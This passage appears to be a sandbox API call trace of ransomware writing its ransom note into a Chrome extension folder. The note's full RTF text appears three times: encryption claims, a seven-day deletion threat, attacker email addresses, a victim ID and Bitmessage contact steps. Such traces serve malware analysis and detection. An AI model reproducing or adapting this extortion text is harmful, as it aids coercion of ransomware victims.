nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.577] CloseHandle (hObject=0x2f0) returned 1 [0286.577] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\#readme_eman#.rtf")) returned 0xffffffff [0286.577] GetLastError () returned 0x2 [0286.577] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.578] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.578] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.578] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 